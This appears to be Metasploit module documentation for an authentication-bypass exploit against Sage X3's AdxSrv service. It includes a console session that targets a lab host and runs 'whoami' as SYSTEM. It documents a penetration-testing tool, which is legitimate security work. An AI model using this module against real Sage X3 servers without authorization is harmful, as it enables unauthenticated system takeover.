## Vulnerable Application

### Description

This module leverages an authentication bypass exploit within Sage X3 `AdxSrv`'s administration
protocol to execute arbitrary commands as `SYSTEM` against a Sage X3 Server running an
available `AdxAdmin` service.

### Setup

Not available.

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Scenarios

### Sage X3 on Windows Server 2016

```
msf6 > use exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec
[*] Using configured payload cmd/windows/generic
msf6 exploit(windows/sage/x3_adxsrv_auth_bypass_cmd_exec) > options

Module options (exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   1818             yes       The target port (TCP)


Payload options (cmd/windows/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   whoami           yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Windows Command


msf6 exploit(windows/sage/x3_adxsrv_auth_bypass_cmd_exec) > set rhosts 172.16.57.6
rhosts => 172.16.57.6
msf6 exploit(windows/sage/x3_adxsrv_auth_bypass_cmd_exec) > set rport 50000
rport => 50000
msf6 exploit(windows/sage/x3_adxsrv_auth_bypass_cmd_exec) > run

[*] 172.16.57.6:50000 - Connected
[+] 172.16.57.6:50000 - ADXDIR authentication successful.
[+] 172.16.57.6:50000 - Received directory info from host: D:\Sage\SafeX3\AdxAdmin
[+] 172.16.57.6:50000 - Command authentication successful.
[*] 172.16.57.6:50000 - Writing data
[+] 172.16.57.6:50000 - ------------ Response Received ------------
[*] 172.16.57.6:50000 - nt authority\system
[!] 172.16.57.6:50000 - This exploit may require manual cleanup of 'D:\Sage\SafeX3\AdxAdmin\tmp' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/sage/x3_adxsrv_auth_bypass_cmd_exec) >
```
